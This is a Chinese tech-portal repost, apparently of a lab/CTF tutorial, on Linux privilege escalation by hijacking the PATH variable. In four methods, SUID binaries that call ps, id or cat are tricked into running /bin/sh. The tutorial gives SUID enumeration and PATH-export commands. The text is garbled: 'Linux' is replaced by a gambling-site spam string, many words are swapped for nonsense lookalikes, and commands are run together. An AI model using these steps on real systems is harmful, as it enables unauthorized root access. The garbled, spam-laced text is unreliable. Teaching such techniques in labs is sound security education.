|
|
|
|
挪动端

黑客的通博8888官网神技艺:运用情况变量停止提权

在这篇文章中,我将会为各人引见一些运用情况变量停止通博8888官网提权的办法,包罗在CTF challenges中运用到一些的技能。话未几说,让我们进入正题!

作者:佚名泉源:马哥通博8888官网运维|2018-07-06 13:02

【新品产上线啦】51CTO播客,随时随地,碎片化学习

黑客的通博8888官网神技艺:运用情况变量停止提权

在这篇文章中,我将会为各人引见一些运用情况变量停止通博8888官网提权的办法,包罗在CTF challenges中运用到一些的技能。话未几说,让我们进入正题!

引见

PATH是通博8888官网和类Unix操纵零碎中的情况变量,它指定存储可实行顺序的一切bin和sbin目次。当用户在终端上实行任何下令时,它会经过PATH变量来呼应用户实行的下令,并向shell发送恳求以搜刮可实行文件。超等用户通常还具有/sbin和/usr/sbin条款,以便于零碎办理下令的实行。

运用echo下令表现以后PATH情况变量:

  1. echo $PATH  
  2. /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games 

假如你在PATH变量中看到‘.’,则意味着登任命户可以从以后目次实行二进制文件/剧本,这关于打击者而言也是一个提权的绝好时机。这里之以是没有指定顺序的完好途径,每每是由于编写顺序时的忽略形成的。

办法1

Ubuntu LAB SET_UP

以后,我们位于/home/raj目次,我们将在此中创立一个名为/script的新目次。在script目次下,我们将编写一个小型的c顺序来挪用零碎二进制文件的函数。

  1. pwdmkdir scriptcd /scriptnano demo.c 

正如你在demo.c文件中看到的,我们正在挪用ps下令。

然后运用gcc编译demo.c文件,并提拔编译文件的SUID权限。

  1. lsgcc demo.c -o shellchmod u+s shellls -la shell 

受益者VM呆板

假定我们曾经乐成浸透目的,并进入提权阶段。我们经过ssh乐成登录到了受益者的呆板。然后运用Find下令,搜刮具有SUID或4000权限的文件。

  1. find / -perm -u=s -type f 2>/dev/null 

经过上述下令,打击者可以罗列出目的零碎上一切的可实行文件,这里可以看到/home/raj/script/shell具有SUID权限。

进入到/home/raj/script目次,可以看到该目次下有一个可实行的“shell”文件,我们运转这个文件。

  1. /home/raj/script 

 

Echo下令 

  1. cd /tmpecho “/bin/sh” > pschmod 777 psecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shellwhoami 

Copy下令 

  1. cd /home/raj/script/cp /bin/sh /tmp/psecho $PATHexport PATH=/tmp:$PATH./shellwhoami 

Symlink下令 

  1. ln -s /bin/sh psexport PATH=.:$PATH./shellidwhoami 

留意:标记链接也叫软链接,假如目次具有完全权限,则它将乐成运转。在Ubuntu中symlink状况下,我们曾经付与了/script目次777的权限。

因而,打击者可以利用情况变量PATH来停止提权,并取得root拜访权限。

办法2

Ubuntu LAB SET_UP

反复上述步调设置装备摆设你的实行情况,如今在剧本目次中,我们将编写一个小型的c顺序来挪用零碎二进制文件的函数。

  1. pwdmkdir scriptcd /scriptnano demo.c 

正如你在demo.c文件中看到的,我们正在挪用id下令。

然后运用gcc编译demo.c文件,并提拔编译文件的SUID权限。

  1. lsgcc demo.c -o shell2chmod u+s shell2ls -la shell2 

受益者VM呆板

异样,假定我们曾经乐成浸透目的,并进入提权阶段。我们经过ssh乐成登录到了受益者的呆板。然后运用Find下令,搜刮具有SUID或4000权限的文件。在这里,我们可以看到/home/raj/script/shell2具有SUID权限。

  1. find / -perm -u=s -type f 2>/dev/null 

进入到/home/raj/script目次,可以看到该目次下有一个可实行的“shell2”文件,我们运转这个文件。

  1. cd /home/raj/scriptls./shell2 

 

Echo下令 

  1. cd /tmpecho “/bin/sh” > idchmod 777 idecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shell2whoami 

办法3

Ubuntu LAB SET_UP

反复上述步调设置装备摆设你的实行情况。正如你在demo.c文件中看到的,我们正在挪用cat下令从etc/passwd文件中读取内容。

然后运用gcc编译demo.c文件,并提拔编译文件的SUID权限。

  1. lsgcc demo.c -o rajchmod u+s rajls -la raj 

受益者VM呆板

异样,假定我们曾经乐成浸透目的,并进入提权阶段,经过实行以下下令检查sudo用户列表。

  1. find / -perm -u=s -type f 2>/dev/null 

在这里,我们可以看到/home/raj/script/raj具有SUID权限,进入到home/raj/script/目次,可以看到该目次下有一个可实行的“raj”文件。以是当我们运转这个文件时,它会把etc/passwd文件作为输入后果。

  1. cd /home/raj/script/ls./raj 

Nano**编辑器** 

  1. cd /tmpnano cat 

如今,当终端翻开时输出/bin/bash并保管。

  1. chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./rajwhoami 

办法4

Ubuntu LAB SET_UP

反复上述步调设置装备摆设你的实行情况。正如你在demo.c文件中看到的,我们正在挪用cat下令读取/home/raj中的msg.txt中的内容,但/home/raj中并没有如许的文件。

然后运用gcc编译demo.c文件,并提拔编译文件的SUID权限。

  1. lsgcc demo.c -o ignitechmod u+s ignitels -la ignite 

受益者VM呆板

异样,假定我们曾经乐成浸透目的,并进入提权阶段,经过实行以下下令检查sudo用户列表

  1. find / -perm -u=s -type f 2>/dev/null 

在这里,我们可以看到/home/raj/script/ignite具有SUID权限,进入到/home/raj/script目次,可以看到该目次下有一个可实行的“ignite”文件。以是当我们运转这个文件时,它会报错“cat: /home/raj/msg.txt”文件或目次不存在。

  1. cd /home/raj/scriptls./ignite 

Vi编辑器 

  1. cd /tmpvi cat 

如今,当终端翻开时输出/bin/bash并保管。

  1. chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./ignitewhoami 

原文链接:http://www.freebuf.com/articles/system/173903.html

【编辑引荐】

  1. 通博8888官网小本领,怎样完成免暗码登录,为效劳器运维节流工夫
  2. 通博8888官网 Mint 19开放晋级 开辟者:自觉晋级没须要 用户有晋级自动权
  3. 顺序员必学!最受欢送的通博8888官网入门根底
  4. 关于通博8888官网零碎怎样挂载数据盘?
  5. 4种用于构建嵌入式通博8888官网零碎的东西
【责任编辑:庞桂玉 TEL:(010)68476606】

点赞 0
各人都在看
猜你喜好

读 书 +更多

开源osCommerce 轻松架设专业电子商务平台

osCommerce是一款收费的、开放源代码的专业电子商务处理方案。本书以浅显易懂的言语向读者展现了该软件弱小的功用和浅易的操纵办法,次要内...

订阅51CTO邮刊

点击这里检查样刊

订阅51CTO邮刊